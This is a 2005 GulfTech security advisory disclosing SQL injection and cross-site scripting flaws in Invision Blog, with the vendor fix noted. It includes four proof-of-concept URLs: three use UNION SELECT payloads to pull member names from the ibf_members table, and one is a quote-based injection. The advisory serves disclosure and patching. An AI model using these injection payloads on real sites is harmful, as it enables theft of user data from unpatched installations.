<<< Date Index >>>     <<< Thread Index >>>

Invision Community Blog Vulnerabilities



##########################################################
# GulfTech Security Research               June 7th, 2005
##########################################################
# Vendor  : Invision Power Services
# URL     : http://www.invisionblog.com
# Version : All Versions Prior To 1.1.2 Final
# Risk    : Multiple Vulnerabilities
##########################################################



Description:
Invision Blog is a community based blogging software that can be
integrated into Invision Power Board. There are several dangerous
SQL Injection vulnerabilities, as well as a cross site scripting
vulnerability. These vulnerabilities could allow for an attacker
to gain access to sensitive data such as password information and
render hostile script in the context of a victims browser which
could lead to disclosure of sensitive data such as cookie data.



Cross Site Scripting:
There is a cross site scripting issue in Invision Blog that may
allow for an attacker to render hostile client side code in a
users browser. The vulnerable function convert_highlite_words()
doesn't properly sanitize data returned by urldecode() and can be
taken advantage of by double hex encoding highlight data.



SQL Injection:
There are a number of serious SQL Injection vulnerabilities in the
Invision Blog software. Below are harmless examples that will pull a users
name from the database.

http://localhost/index.php?automodule=blog&blogid=1&cmd=editentry&eid=99
%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_
members%20WHERE%201/*

http://localhost/index.php?automodule=blog&blogid=1&cmd=replyentry&eid=99
%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_
members%20WHERE%201/*

http://localhost/index.php?automodule=blog&blogid=1&cmd=editcomment&eid=1&;
cid=-99%20UNION%20SELECT%201,0,0,0,0,0,0,0,0,0,0,0,0,name%20FROM%20ibf_
members%20WHERE%201/*

http://localhost/index.php?automodule=blog&blogid=1&cmd=aboutme&mid=2'

The last example is not very easy to exploit, but can be exploited with
a bit of effort.



Solution:
Updated version of the Invision Blog software have been available for many
weeks now. Users should upgrade as soon as possible. Special thanks to the
guys at Invision for fixing these issues so quickly :)



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00078-06072005



Credits:
James Bercegay of the GulfTech Security Research Team